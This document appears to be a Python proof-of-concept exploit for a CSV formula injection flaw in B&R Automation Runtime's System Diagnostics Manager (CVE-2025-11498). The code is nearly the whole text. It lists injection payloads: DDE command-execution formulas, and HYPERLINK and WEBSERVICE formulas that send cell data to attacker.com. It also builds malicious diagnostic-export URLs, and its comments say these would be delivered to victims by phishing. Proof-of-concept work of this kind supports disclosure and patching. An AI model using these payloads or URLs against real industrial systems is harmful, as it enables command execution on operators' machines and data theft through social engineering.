CVE-2025-11498 B&R Automation Runtime SDM CSV公式注入漏洞

# CVE-2025-11498 - B&R Automation Runtime SDM CSV Formula Injection PoC # This PoC demonstrates the CSV injection attack vector against SDM import urllib.parse import http.client # Malicious formula payloads for CSV injection PAYLOADS = [ # DDE-based command execution (Microsoft Excel) '=cmd|\'/C calc\'!A0', # HYPERLINK-based data exfiltration '=HYPERLINK("http://attacker.com/exfil?data="&A1, "View Report")', # WEBSERVICE-based SSRF '=WEBSERVICE("http://attacker.com/"&A1)', # Data exfiltration via formula '=2+5+cmd|\'/C calc\'!A0', ] def craft_malicious_url(target_host, target_port, sdm_path, payload): """Craft a malicious URL that triggers SDM to generate CSV with injected formula""" encoded_payload = urllib.parse.quote(payload) # The injection point varies depending on SDM's URL parameter handling # Common injection vectors include report parameters, system names, or diagnostic queries malicious_url = f"http://{target_host}:{target_port}{sdm_path}?system={encoded_payload}&action=diagnostics&export=csv" return malicious_url def exploit(target_host, target_port=80, sdm_path="/sdm/diagnostics"): """Main exploitation function""" for payload in PAYLOADS: url = craft_malicious_url(target_host, target_port, sdm_path, payload) print(f"[*] Malicious URL crafted: {url}") # In a real attack scenario, this URL would be sent to the victim # via phishing email, social engineering, or embedded in a webpage # Example of malicious CSV output that SDM would generate: malicious_csv = """System Diagnostics Report\nTimestamp,System,Status,Details\n2025-10-14,=cmd|'/C calc'!A0,Running,Normal\n""" print(f"[*] Expected malicious CSV content:\n{malicious_csv}") if __name__ == "__main__": exploit("victim-bnr-runtime.local")